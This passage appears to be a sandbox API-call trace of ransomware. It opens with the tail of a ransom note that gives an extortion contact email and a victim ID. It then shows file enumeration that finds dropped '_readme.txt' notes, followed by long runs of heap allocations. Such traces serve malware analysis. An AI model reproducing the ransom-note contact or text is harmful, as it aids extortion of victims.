address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.006] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.006] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.006] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.006] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.006] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.007] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.007] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.008] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.008] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.009] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.009] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.010] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.010] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.011] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.011] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: 